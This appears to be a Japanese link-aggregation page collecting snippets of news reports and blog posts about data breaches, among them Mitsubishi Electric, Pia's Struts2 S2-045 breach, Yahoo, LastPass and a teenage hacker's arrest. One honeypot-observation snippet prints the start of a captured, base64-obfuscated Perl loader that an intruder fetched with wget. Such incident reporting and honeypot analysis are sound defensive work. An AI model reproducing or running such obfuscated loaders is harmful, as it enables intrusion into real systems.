【独自】三菱電機にサイバー攻撃 防衛などの情報流出か:朝日新聞デジタル
大手総合電機メーカーの三菱電機が大規模なサイバー攻撃を受け、機密性の高い防衛関連、電力や鉄道といった重要な社会インフラ関連など官民の取引先に関する情報が広く流出した恐れがあることがわかった。本社や主要拠点のパソコンやサーバーが多数の不正なアクセスを受けたことが社内調査で判明した。同社は不正アクセスの手口などから、防衛関連の機密情報を主に狙う中国系のサイバー攻撃集団「Tick(ティック)」が関与した可能性があるとみている。 複数の関係者や社内調査によると、少なくとも国内外の120台超のパソコンや、40台超のサーバーに不正に侵入された形跡が見つかった。不正アクセスの被害は全社的な規模に及ぶ。 自社の情報に加え、防衛省、環境省、内閣府、原子力規制委員会、資源エネルギー庁など10を超える官公庁や政府機関、電力、通信、JR・私鉄、自動車の大手を中心に少なくとも数十社の国内外の民間企業に関する様々な情
ログ消去もされていた三菱電機の不正アクセスについてまとめてみた - piyolog
2020年1月20日、三菱電機は自社ネットワークが不正アクセスを受け、個人情報等が外部へ流出した可能性があると発表しました。ここでは関連する情報をまとめます。報道によれば現在も三菱電機は不正アクセスへの社内調査等を進めています。 発端は研究所サーバーの不審ファイル動作 2019年6月28日に情報技術総合研究所のサーバーで不審なファイルが動作したことを社内で検知。 同じファイルが中国、及び国内他拠点で検出され内部侵害の被害を受けている可能性を受け調査を開始。 報道された出来事を時系列にまとめると以下の通り。 日時 出来事 2017年後半? 三菱電機の中国国内子会社でマルウェア感染。 2019年3月18日 三菱電機が中国拠点のウイルスバスター法人向け製品の脆弱性を悪用された攻撃を受ける。*1 : アップデート機能を悪用し中国拠点で侵害範囲が拡大。 2020年4月3日 中国拠点端末より国内拠点の
三菱UFJ銀行が不正アクセスを受けた通信暗号化装置について調べてみた - piyolog
三菱UFJ銀行は法人顧客向けに提供するローカルキャッシュマネジメントサービスの認証システムで利用する通信暗号化装置が不正アクセスを受け、海外拠点の顧客の口座情報等が外部に流出したと発表しました。ここでは関連する情報と発表で言及があった「通信暗号化装置」についてpiyokangoが調べた情報をまとめます。 不正アクセス原因は通信暗号化装置の脆弱性 [PDF] ローカルキャッシュマネジメントサービスの通信暗号化装置への不正アクセスによる台湾拠点の一部お客さま情報および第三者情報の漏えいについて 通信暗号化装置の具体的な製品名は記載無し。 インターネット経由でLCMSに接続する際にユーザー認証し、通信を暗号化するための装置といった説明。 外部からの不正アクセスはこの装置に対して行われた。原因は脆弱性が存在したため。 通信暗号化装置の脆弱性はバージョンアップにて対応された。 タイムラインの整理 関
「カラーミーショップ」における情報流出に関するご報告とお詫び ※2018年2月21日追記 | GMOペパボ株式会社
本件に関する問い合わせにつきましては、2月16日(金)15時より以下の通り、変更させていただきます。 電話番号:050-3204-4543 受付時間:午前10時~午後7時(平日のみ) このたび、GMOペパボ株式会社(以下、「弊社」)が運営するネットショップ運営サービス「カラーミーショップ」(以下、「本サービス」)において、第三者による不正アクセスが確認され、本サービスを利用してネットショップを運営いただいている一部のお客様(以下、「ショップオーナー様」)の情報の流出と、一部のショップオーナー様および本サービスを利用しているネットショップで購入された一部の方(以下、「購入者様」)のクレジットカード情報の流出、またはその可能性があること(以下、「本件」)が判明いたしました。
不正アクセスによる情報流出の可能性に関するお知らせとお詫び(第一報)
>第二報についてはこちらをご確認ください >最終報についてはこちらをご確認ください 謹啓 貴社益々のご盛隆のこととお慶び申し上げます。平素は格別のお引きたてを賜り厚くお礼を申し上げます。 このたび、弊社の保持する検証サーバー(保守契約管理システムの検証サーバー、以下 当該サーバー)に対する不正アクセスが確認されました。当該サーバーには、保守契約管理システムの移行作業で利用する取引先情報が格納されたファイルが存在し、不正アクセスを行った第三者(以下、攻撃者)に情報が流出した可能性があることが判明しました。お客様および関係者の皆様に多大なるご心配とご迷惑をおかけいたしますことを、深くお詫び申し上げます。 現在、第三者機関による詳細な調査を行っており、詳細が判明次第、速やかに公表する予定です。弊社および第三者機関において、攻撃者が当該ファイルを持ち出した痕跡を確認する一次調査を行いましたが、情報
またもStruts2で漏洩、ぴあ運営のB.LEAGUEサイトから流出したカード番号で被害
ぴあは2017年4月25日、同社が運営を受託しているプロバスケットボールリーグ「B.LEAGUE」関連のWebサイトから最大約15万5000件の個人情報が流出した可能性があると発表した。原因は同サイトに使っている「Apache Struts2」の脆弱性。約3万2000件のクレジットカード情報も含まれるという。 不正アクセスを受けたのはB.LEAGUEチケットサイトとファンクラブ受付サイトのサーバー。B.LEAGUEチケットサイトはホットファクトリー、ファンクラブ受付サイトはききょう屋ソフトが、ぴあの発注を受けて構築したという。情報流出の原因になったのはJavaのWebアプリケーションフレームワーク「Apache Struts2」の脆弱性。これらのサイトがStruts2を使用していた。 同年3月10日、Struts2の脆弱性を情報処理推進機構(IPA)が公表した。ただぴあは当初、B.LEAG
ぴあ運営サイト不正アクセス、Struts2の脆弱性は「S2-045」
ぴあは同社が運営受託しているプロバスケットボールリーグ「B.LEAGUE」関連のWebサイトが不正アクセスを受けた問題で、原因となった「Apache Struts2」の脆弱性の識別子が、3月9日に公開された「S2-045」であると本誌取材に回答した。 不正アクセスを受けたのは、B.LEAGUEチケットサイトとファンクラブ受付サイトのサーバーだ。B.LEAGUEチケットサイトはホットファクトリー、ファンクラブ受付サイトはききょう屋ソフトが、ぴあの発注を受けて構築した。両サイトではStruts2を使用しており、任意のコードを実行できるS2-045という脆弱性を悪用された。 ぴあは3月25日に両サイトにおける全てのクレジットカード決済機能を停止し、調査会社のPayment Card Forensics(PCF)に詳細な調査を依頼した。4月10日のPCFからの中間報告で、不正アクセスを受けていたこ
弊社役員のGyazoアカウントおよびTwitterアカウントへの不正アクセスに関するお詫びとご報告 - Gyazo Blog
平素よりGyazoならびにScrapboxをご利用いただきありがとうございます。この度、弊社CTO増井俊之(以下当人)のTwitterアカウントとGyazoアカウントが不正利用されているとのご指摘をユーザーのみなさまよりいただき、事実関係を調査いたしましたところ、不正利用の事実が判明いたしました。 アクセスログ等の確認ならびに当人への聞き取り調査により、当人がGyazoアカウントに他のWebサービスと同じパスワードを設定しており、このパスワードが漏れたために第三者に不正利用されたものと確認しております(いわゆるパスワードの使い回し)。また、当人がGyazoアカウントにTwitterアカウントのIDとパスワードを含むスクリーンショットを保存しており、その画像を元にTwitterアカウントも不正利用されたことが、アクセスログ等の確認ならびに当人への聞き取り調査により判明しました。現在、当人にパ
米ヤフー 5億件以上のアカウント情報盗まれる | NHKニュース
アメリカのIT企業ヤフーは、おととしサイバー攻撃を受けて世界各国の利用者の名前やメールアドレスなどの個人情報を含む5億件以上のアカウント情報が盗まれていたことを明らかにしました。 盗まれたアカウント情報は少なくとも5億件に上り、利用者の名前、メールアドレス、電話番号、生年月日などの個人情報が含まれています。クレジットカードの番号や銀行の口座番号などは、今のところ、盗まれたことは確認されていないとしています。 ヤフーは、どの国の利用者の情報が盗まれたかは明らかにしていませんが、可能性のある利用者に連絡を取って速やかにパスワードを変更するよう求めるとともに、おととし以降、パスワードを変えていないすべての利用者にも変更を呼びかけています。 サイバー攻撃はいずれかの国家の支援を受けたハッカーが行ったとみられるということで、捜査機関が調べているとしています。 アメリカでは、IT企業や金融機関がサイバ
404 File not Found - 印刷通販なら印刷専門サイト【アドプリント】
アクセスしようとしたページが見つかりません。 ・ 一時的な問題によりアクセスできない可能性があります。 ・ 指定されたページは削除されたか、移動した可能性があります。 ・ URL、ファイル名にタイプミスがないかご確認ください。 トップページに戻る
不正アクセスによる個人情報流出に関するお詫びと再発防止策のご報告(第2報)|印刷通販のグラフィック
(第1報)2016年7月27日配信分 (第1報)2016年7月22日配信分 (第1報)2016年7月19日配信分 2016年9月06日 お客様各位 株式会社グラフィック 代表取締役 西野 能央 不正アクセスによる個人情報流出に関するお詫びと再発防止策のご報告(第2報) 7月19日に発表しました不正アクセスによる弊社顧客情報データベース(以下「顧客DBS」といいます)からの情報流出事案について、 原因ならびに被害状況等を外部の専門調査会社(以下、「調査会社」といいます)で調査を実施しておりました。 先般の発表時には、「弊社はクレジットカード情報をお客様からお預かりしていないため、クレジットカード情報の流出はございません。」とご説明しておりましたが、このたびの調査の結果、顧客DBSにお客様のクレジットカード情報が保管され、かつ当該不正アクセスによってその一部が流出していたことが判明
2年前の情報流出 実は6倍の62万人分と判明 | NHKニュース
2年前、大手インターネット関連企業「GMOインターネット」のグループ会社が不正なアクセスを受け、当時は会員およそ10万人分の個人情報が流出した可能性があると発表していましたが、実は62万人分が流出していたことが分かり、会社側は改めて謝罪しました。 会社側の説明によりますと、このサイトでは会員に対して、インターネット通販を行うページの作成を支援するサービスを提供していましたが、おととし9月、何者かによる不正アクセスを受けました。 会社側は当時、会員の名前や住所、職業やパスワードなど、およそ10万人分が流出した可能性があると発表していましたが、警察から「被害はもっと大きい」と指摘を受けて調べ直した結果、実際には複数のサーバーが被害を受けていて、およそ62万人分の流出が確認されたということです。 会社側では流出した情報による会員の被害は報告されていないとしたうえで、「お客様には多大なご心配とご迷
長澤まさみさんらの写真のぞき見容疑 29歳男を逮捕:朝日新聞デジタル
フェイスブック(FB)や、アップルのデータ共有サービス「iCloud」(アイクラウド)に不正アクセスし、女優の長澤まさみさんや武井咲さんらの個人情報をのぞき見したとして、警視庁は長崎県大村市諏訪1丁目の会社員金子大地容疑者(29)を不正アクセス禁止法違反の疑いで逮捕し、18日発表した。容疑を認めているという。 サイバー犯罪対策課によると、金子容疑者の逮捕容疑は2014年8月~15年11月、芸能人や一般女性の計4人のFBに不正にログインしたほか、芸能人5人のアイクラウドに計236回不正にアクセスしたというもの。捜査関係者などによると、被害者には長澤さんや武井さん、女優の北川景子さん、タレントの紗栄子さん、尾崎ナナさんが含まれ、家族や友人との写真が盗み見されていた可能性があるという。 アイクラウドは、インターネットを通じてスマートフォンなどのデータを保存する「クラウドサービス」の一つ。メールア
日本テレビWebサイトへの不正アクセスについてまとめてみた - piyolog
日本テレビ放送網株式会社は4月21日、同社Webサイトが不正アクセスを受け、個人情報が漏えいした可能性があると発表しました。ここでは関連情報をまとめます。 公式発表 日本テレビ放送網 2016年4月21日 弊社ホームページへの不正アクセスによる個人情報流出の可能性について(魚拓) 2016年4月21日 [PDF] 弊社ホームページへの不正アクセスによる個人情報流出の可能性について 概要 2016年7月14日 弊社ホームページへの不正アクセスに関する調査委員会による調査結果のお知らせ (魚拓) フォアキャスト・コミュニケーションズ 2016年7月14日 不正アクセスによる個人情報流出に関するお詫びとご報告 (魚拓) 自社報道 2016年4月21日 日テレHPに不正アクセス 個人情報流出か(魚拓) インシデントタイムライン 不正アクセス関連 日時 出来事 2016年4月20日13時39分 日本
SSH不正侵入、観察日記
不正アクセスを観測したのでご紹介。 動画を見ていただこう。 なにやら不正ファイルをwgetして実行しようとしてる。 Kippoは、侵入者がwgetしたファイルを、dl ディレクトリに全て格納してくれるので今回は実際に不審なファイルの中身を見てみよう。 中身を覗いてみる。encodeされていたので、見た目では、なにをするものなんかはわからない。 # more dl/20150709223030_http___erixx_altervista_org_new_txt #!/usr/bin/perl use MIME::Base64; eval (decode_base64('IyEvdXNyL2Jpbi9wZXJsDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy
0chiaki氏逮捕の考察 - nalilix’s diary
この記事は考察記事です。 彼と過去に会話した内容から、なぜ身元がバレて逮捕をされたのかを考察しています。 基本的に報道機関は一般人にも分かるように報道するため、ネットに強い人達には情報が少なく詳細を知りたいって方が多いと思ったので記事を書いてみることにしました。 考察の元となった情報源は言えません。信じるか信じないかはあなた次第です。 0chiaki氏のネット環境 彼の自宅にはネット回線がひかれてありません。 だったらどうやってネットにつないでいるかといったら、近くの無線LAN(FON)をタダ乗りしてネットに接続していました。 また、彼は普段使うOSにTails OSという、エドワード・スノーデンも使っていると言われている暗号化OSを利用していました。 このOSは、全ての通信がTor接続となり、またOS自体は暗号化され復号しないと中身が見れないという今あるOSの中では一番秘匿性の高いOSで
「Tor」使い不正アクセス 17歳少年逮捕 NHKニュース
発信元の特定を難しくする特殊なソフトを使って、東京の出版社のサーバーに不正にアクセスしたなどとして、川崎市の17歳の少年が警視庁に逮捕されました。 少年は、企業などにサイバー攻撃を繰り返し、その状況をネット上に書き込んでアピールするハッカーを名乗っていて、警視庁は、ほかにもサイバー攻撃を繰り返していたとみて調べています。 警視庁によりますと、少年はサーバー会社を装って出版社の社員にメールを送りつけて偽のページに誘導し、盗み取った社員のIDなどを使って出版社のサーバーに侵入したということです。 調べに対し、少年は容疑を認めているということです。 警視庁などによりますと、少年はネット上で「0chiaki」と名乗り、企業などにサイバー攻撃を繰り返し、その状況をツイッターなどでアピールするハッカーとして知られています。 出版社の事件でもツイッターに「ターゲットは決まった」とか「ハードディスクを使え
パスワード一元管理のLastPassにハッキング、情報流出も
一方、LastPassの保管庫に保存された他のサイトのパスワードを変更する必要はないとしている。ただ、安易なパスワードを使っている場合や、マスターパスワードと同じパスワードを他のWebサイトでも使い回している場合は直ちに変更するよう呼び掛けている。 関連記事 Googleの二段階認証を3400円のUSBキーで試す Amazon.co.jpでFIDO 1.0仕様のUSBキーを購入しました。ようやく二段階認証が一般的になるのではないかと期待しています。 米連邦政府、400万人分の個人情報流出の可能性を発表 中国ハッカーの犯行との報道も 米連邦人事管理局が、同局のシステムに何者かが不正侵入し、約400万人の職員および元職員の個人情報が流出した可能性があると発表した。複数の米メディアが、当局がこれを中国ハッカーの犯行とみていると報じた。 年金情報125万件流出 年金機構に不正アクセス ウイルス入り
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
コインチェックに不正アクセスされ大量の仮想通貨を盗まれる→運営「保証制度は現在調整中です」
Engadget | Technology News & Reviews
